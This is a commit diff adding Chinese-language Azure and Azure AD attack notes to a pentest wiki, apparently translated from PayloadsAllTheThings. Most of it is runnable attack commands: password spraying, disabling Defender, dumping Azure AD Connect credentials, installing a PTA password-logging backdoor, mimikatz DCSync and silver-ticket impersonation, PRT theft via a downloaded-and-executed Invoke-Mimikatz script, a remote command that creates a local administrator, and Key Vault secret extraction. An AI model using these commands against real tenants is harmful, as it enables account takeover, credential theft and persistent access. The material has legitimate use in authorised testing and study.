update cloud hacking

Author: xiaoy-sec

wiki/README.md

@@ -584,6 +584,28 @@
     - [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限提升.md)
     - [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/权限维持.md)
     - [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/kubernetes/枚举.md)
+  - [Azure](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/README.md)
+    - [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
+    - [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
+    - [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
+    - [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
+    - [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
+    - [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
+    - [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
+    - [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
+    - [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
+    - [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
+    - [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
+    - [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
+    - [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
+    - [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
+    - [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
+    - [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
+    - [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
+    - [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
+    - [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
+    - [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
+    - [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)
   - [Aliyun](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/README.md)
     - [osskey](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Aliyun/osskey.md)
   - [工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/工具.md)

wiki/云安全/AWS/README.md

@@ -1,3 +1,4 @@
+translate from https://github.com/swisskyrepo/PayloadsAllTheThings
 - [初始访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/初始访问.md)
 - [权限提升](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限提升.md)
 - [权限维持](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/AWS/权限维持.md)

wiki/云安全/Azure/Administrative-Unit.md

@@ -0,0 +1,9 @@
+	Administrative Unit可以重置其他用户密码
+
+	PS AzureAD> Get-AzureADMSAdministrativeUnit -Id <ID>
+	PS AzureAD> Get-AzureADMSAdministrativeUnitMember -Id <ID>
+	PS AzureAD> Get-AzureADMSScopedRoleMembership -Id <ID> | fl
+	PS AzureAD> Get-AzureADDirectoryRole -ObjectId <RoleId>
+	PS AzureAD> Get-AzureADUser -ObjectId <RoleMemberInfo.Id> | fl 
+	PS C:\Tools> $password = "Password" | ConvertToSecureString -AsPlainText -Force
+	PS C:\Tools> (Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "<Username>@<TENANT NAME>.onmicrosoft.com"}).ObjectId | SetAzureADUserPassword -Password $Password -Verbose

wiki/云安全/Azure/AzureAD.md

@@ -0,0 +1,26 @@
+	对于 Microsoft，如果您将任何云服务（Office 365、Exchange Online 等）与 Active Directory（本地或在 Azure 中）一起使用，那么攻击者只需一个凭证就可以通过 Azure AD泄露您的整个 Active Directory 结构
+	验证您的网络邮件门户（即https://webmail.domain.com/）
+	将浏览器 URL 更改为：https ://azure.microsoft.com/
+	从活动会话中选择帐户
+	选择 Azure Active Directory
+| Active Directory  | Azure AD  |
+|---|---|
+| LDAP  | REST API'S  |
+| NTLM/Kerberos  | OAuth/SAML/OpenID |
+| Structured directory (OU tree)  | Flat structure  |
+| GPO  | No GPO's  |
+| Super fine-tuned access controls  | Predefined roles |
+| Domain/forest  | Tenant  |
+| Trusts  | Guests  |
+
+	密码喷射
+	>git clone https://github.com/dafthack/MSOLSpray
+	>Import-Module .\MSOLSpray.ps1
+	>Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
+	>Invoke-MSOLSpray -UserList .\users.txt -Password d0ntSprayme!
+	将 GUID 转换为 SID
+	通过连接"S-1–12–1-"到 AAD Id 的每个部分的十进制表示，将用户的 AAD id 转换为 SID。
+
+	GUID: [base16(a1)]-[base16(a2)]-[ base16(a3)]-[base16(a4)]
+	SID: S-1–12–1-[base10(a1)]-[ base10(a2)]-[ base10(a3)]-[ base10(a4)]
+	例如，表示6aa89ecb-1f8f-4d92–810d-b0dce30b6c82是S-1–12–1–1789435595–1301421967–3702525313–2188119011

wiki/云安全/Azure/AzureAD连接.md

@@ -0,0 +1,59 @@
+  #### 检查是否安装了 Azure AD Connect：Get-ADSyncConnector
+
+	对于PHS，我们可以提取凭证
+	对于PTA，我们可以安装代理
+	对于联合身份，我们可以使用 DA 从 ADFS 服务器提取证书
+	PS > Set-MpPreference -DisableRealtimeMonitoring $true
+	PS > Copy-Item -ToSession $adcnct -Path C:\Tools\AADInternals.0.4.5.zip -Destination C:\Users\Administrator\Documents
+	PS > Expand-Archive C:\Users\Administrator\Documents\AADInternals.0.4.5.zip -DestinationPath C:\Users\Administrator\Documents\AADInternals
+	PS > Import-Module C:\Users\Administrator\Documents\AADInternals\AADInternals.psd1
+	PS > Get-AADIntSyncCredentials
+
+	获取 SYNC 帐户的令牌并重置本地管理员密码
+	PS > $passwd = ConvertToSecureString 'password' -AsPlainText -Force
+	PS > $creds = New-Object System.Management.Automation.PSCredential ("<Username>@<TenantName>.onmicrosoft.com", $passwd)
+	PS > GetAADIntAccessTokenForAADGraph -Credentials $creds –SaveToCache
+	PS > Get-AADIntUser -UserPrincipalName onpremadmin@defcorpsecure.onmicrosoft.com | select ImmutableId
+	PS > Set-AADIntUserPassword -SourceAnchor "<IMMUTABLE-ID>" -Password "Password" -Verbose
+
+  #### 检查是否安装了 PTA：Get-Command -Module PassthroughAuthPSModule
+	安装 PTA 后门
+	PS AADInternals> Install-AADIntPTASpy
+	PS AADInternals> Get-AADIntPTASpyLog -DecodePasswords
+
+  #### Azure AD Connect - 密码提取
+	AD Sync 中的凭据：C:\Program Files\Microsoft Azure AD Sync\Data\ADSync.mdf
+工具 | 需要在目标上执行代码 | DLL 依赖项 | 本地需要 MSSQL | 本地需要python
+--- | --- | --- | --- | ---
+ADSyncDecrypt | 是 | 是 | 否 | 否
+ADSyncGather | 是 | 否 | 否 | 是
+ADSyncQuery | 否 (仅限网络 RPC 调用) | 否 | 是 | 是
+
+	git clone https://github.com/fox-it/adconnectdump
+  #### Azure AD Connect - MSOL 帐户的密码和 DCSync
+  	可以使用 MSOL 帐户执行DCSync攻击
+	要求：
+	使用 Azure AD Connect 服务破坏服务器
+	访问 ADSyncAdmins 或本地管理员组
+	使用azuread_decrypt_msol.ps1来恢复 MSOL 帐户的解密密码：
+	azuread_decrypt_msol.ps1: AD Connect 同步凭证提取 POC https://gist.github.com/xpn/0dc393e944d8733e3c63023968583545
+	azuread_decrypt_msol_v2.ps1：更新了转储 Azure AD Connect Sync https://gist.github.com/xpn/f12b145dba16c2eebdd1c6829267b90c使用的 MSOL 服务帐户（允许 DCSync）的方法
+	现在可以使用检索到的 MSOL 帐户凭据来发起 DCSync 攻击。
+  #### Azure AD Connect - 银票上的无缝单点登录
+  	任何可以编辑 AZUREADSSOACCS$ 帐户属性的人都可以使用 Kerberos 模拟 Azure AD 中的任何用户（如果没有 MFA）
+	PHS 和 PTA 都支持无缝 SSO。如果启用无缝 SSO，则会在本地 AD 中创建计算机帐户AZUREADSSOC。
+	AZUREADSSOACC 帐户的密码永远不会更改。
+	使用https://autologon.microsoftazuread-sso.com/将 Kerberos 票证转换为 Office 365 和 Azure 的 SAML 和 JWT
+
+	AZUREADSSOACC 帐户的 NTLM 密码哈希，例如f9969e088b2c13d93833d0ce436c76dd.
+	mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
+	我们要模拟的用户的 AAD 登录名，例如elrond@contoso.com. 这通常是他的 userPrincipalName 或来自本地 AD 的邮件属性。
+	我们要模拟的用户的 SID，例如S-1-5-21-2121516926-2695913149-3163778339-1234.
+	创建 Silver Ticket 并将其注入 Kerberos 缓存：
+	mimikatz.exe "kerberos::golden /user:elrond
+	/sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234
+	/domain:contoso.local /rc4:f9969e088b2c13d93833d0ce436c76dd
+	/target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
+	启动 Mozilla Firefox
+	转到 about:config 并将network.negotiate-auth.trusted-uris preference值设置为https://aadg.windows.net.nsatc.net,https://autologon.microsoftazuread-sso.com
+	导航到与我们的 AAD 域集成的任何 Web 应用程序。填写用户名，同时将密码字段留空。

wiki/云安全/Azure/Azure存储Blob.md

@@ -0,0 +1,12 @@
+	枚举 blob
+	PS > . C:\Tools\MicroBurst\Misc\InvokeEnumerateAzureBlobs.ps1
+	PS > Invoke-EnumerateAzureBlobs -Base <SHORT DOMAIN> -OutputFile azureblobs.txt
+	Found Storage Account -  testsecure.blob.core.windows.net
+	Found Storage Account -  securetest.blob.core.windows.net
+	Found Storage Account -  securedata.blob.core.windows.net
+	Found Storage Account -  securefiles.blob.core.windows.net
+	列出和下载 blob
+	PS Az> Get-AzResource
+	PS Az> Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>
+	PS Az> Get-AzStorageContainer -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context
+	PS Az> Get-AzStorageBlobContent -Container <NAME> -Context (Get-AzStorageAccount -name <NAME> -ResourceGroupName <NAME>).context -Blob

wiki/云安全/Azure/Intunes管理.md

@@ -0,0 +1,9 @@
+	要求：
+	全局管理员或Intune管理员特权：Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'"
+
+	登录https://endpoint.microsoft.com/#home或使用 Pass-The-PRT
+	转到设备->所有设备以检查注册到 Intune 的设备
+	转到脚本并单击添加Windows 10。
+	添加Powershell 脚本
+	在分配页面中指定添加所有用户和添加所有设备。
+	执行脚本最多需要一小时

wiki/云安全/Azure/KeyVault.md

@@ -0,0 +1,13 @@
+	keyvault 访问令牌
+	curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
+	curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&apiversion=2017-09-01" -H secret:$IDENTITY_HEADER
+
+	连接
+	PS> $token = 'eyJ0..'
+	PS> $keyvaulttoken = 'eyJ0..'
+	PS Az> Connect-AzAccount -AccessToken $token -AccountId 2e91a4fea0f2-46ee-8214-fa2ff6aa9abc -KeyVaultAccessToken $keyvaulttoken
+
+	查询vault和密钥
+	PS Az> Get-AzKeyVault
+	PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault
+	PS Az> Get-AzKeyVaultSecret -VaultName ResearchKeyVault -Name Reader -AsPlainText

wiki/云安全/Azure/Pass-The-Certificate.md

@@ -0,0 +1,15 @@
+	Copy-Item -ToSession $jumpvm -Path C:\Tools\PrtToCertmaster.zip -Destination C:\Users\Username\Documents\username –Verbose
+	Expand-Archive -Path C:\Users\Username\Documents\username\PrtToCert-master.zip -DestinationPath C:\Users\Username\Documents\username\PrtToCert
+
+	需要 PRT、TenantID、Context 和 DerivedKey
+	& 'C:\Program Files\Python39\python.exe' C:\Users\Username\Documents\username\PrtToCert\RequestCert.py --tenantId <TENANT-ID> --prt <PRT> --userName <Username>@<TENANT NAME>.onmicrosoft.com --hexCtx <HEX-CONTEXT> --hexDerivedKey <HEX-DERIVED-KEY>
+	PFX 使用名称 <Username>@<TENANT NAME>.onmicrosoft.com.pfx 和密码 AzureADCert 保存
+	Python tool that will authenticate to the remote machine, run PSEXEC and open a CMD on the victim machine
+
+	https://github.com/morRubin/AzureADJoinedMachinePTC
+
+	Main.py [-h] --usercert USERCERT --certpass CERTPASS --remoteip REMOTEIP
+	Main.py --usercert "admin.pfx" --certpass password --remoteip 10.10.10.10
+
+	python Main.py --usercert C:\Users\Username\Documents\username\<USERNAME>@<TENANT NAME>.onmicrosoft.com.pfx --
+	certpass AzureADCert --remoteip 10.10.10.10 --command "cmd.exe /c net user username Password@123 /add /Y && net localgroup administrators username /add"

wiki/云安全/Azure/Pass-The-PRT.md

@@ -0,0 +1,28 @@
+	MimiKatz（2.2.0 及更高版本）可用于通过用于 Azure AD SSO（单点登录）的主刷新令牌 (PRT) 来攻击（混合）加入 Azure AD 的机器进行横向移动攻击。
+
+	运行 mimikatz 获取 PRT
+	PS> iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
+	PS> Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'
+
+	复制 PRT 和 KeyValue
+	Mimikatz> privilege::debug
+	Mimikatz> token::elevate
+	Mimikatz> dpapi::cloudapkd /keyvalue:<KeyValue> /unprotect
+
+	复制 Context、ClearKey 和 DerivedKey
+	Mimikatz> dpapi::cloudapkd /context:<Context> /derivedkey:<DerivedKey> /Prt:<PRT>
+	生成 JWT
+	PS> Import-Module C:\Tools\AADInternals\AADInternals.psd1
+	PS AADInternals> $PRT_OF_USER = '...'
+	PS AADInternals> while($PRT_OF_USER.Length % 4) {$PRT_OF_USER += "="}
+	PS AADInternals> $PRT = [text.encoding]::UTF8.GetString([convert]::FromBase64String($PRT_OF_USER))
+	PS AADInternals> $ClearKey = "XXYYZZ..."
+	PS AADInternals> $SKey = [convert]::ToBase64String( [byte[]] ($ClearKey -replace '..', '0x$&,' -split ',' -ne ''))
+	PS AADInternals> New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey –GetNonce
+	eyJ0eXAiOiJKV1QiL...
+	（ JSON Web 令牌）可以在https://login.microsoftonline.com/login.srf<Signed JWT>的（匿名）浏览器会话中用作 PRT cookie 。 使用以下值编辑 Chrome cookie (F12) -> 应用程序 -> Cookies：
+
+	Name: x-ms-RefreshTokenCredential
+	Value: <Signed JWT>
+	HttpOnly: √
+	️用标志HTTPOnly和标记 cookie Secure。

wiki/云安全/Azure/README.md

@@ -0,0 +1,22 @@
+translate from https://github.com/swisskyrepo/PayloadsAllTheThings
+- [侦察工具](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/侦察工具.md)
+- [枚举](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/枚举.md)
+- [非法同意](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/非法同意.md)
+- [钓鱼](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/钓鱼.md)
+- [令牌](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/令牌.md)
+- [向所有EnterpriseApplications添加凭据](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/向所有EnterpriseApplications添加凭据.md)
+- [为AzureWeb应用程序生成SSH](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md)
+- [Azure存储Blob](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Azure存储Blob.md)
+- [自动化runbook](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/自动化runbook.md)
+- [虚拟机runCommand](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/虚拟机runCommand.md)
+- [KeyVault](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/KeyVault.md)
+- [Pass-The-PRT](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-PRT.md)
+- [Pass-The-Certificate](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Pass-The-Certificate.md)
+- [Intunes管理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Intunes管理.md)
+- [动态组成员资格](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/动态组成员资格.md)
+- [Administrative-Unit](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/Administrative-Unit.md)
+- [部署模板](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/部署模板.md)
+- [应用程序代理](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/应用程序代理.md)
+- [条件访问](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/条件访问.md)
+- [AzureAD](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD.md)
+- [AzureAD连接](https://github.com/xiaoy-sec/Pentest_Note/blob/master/wiki/云安全/Azure/AzureAD连接.md)

wiki/云安全/Azure/为AzureWeb应用程序生成SSH.md

@@ -0,0 +1 @@
+	>az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>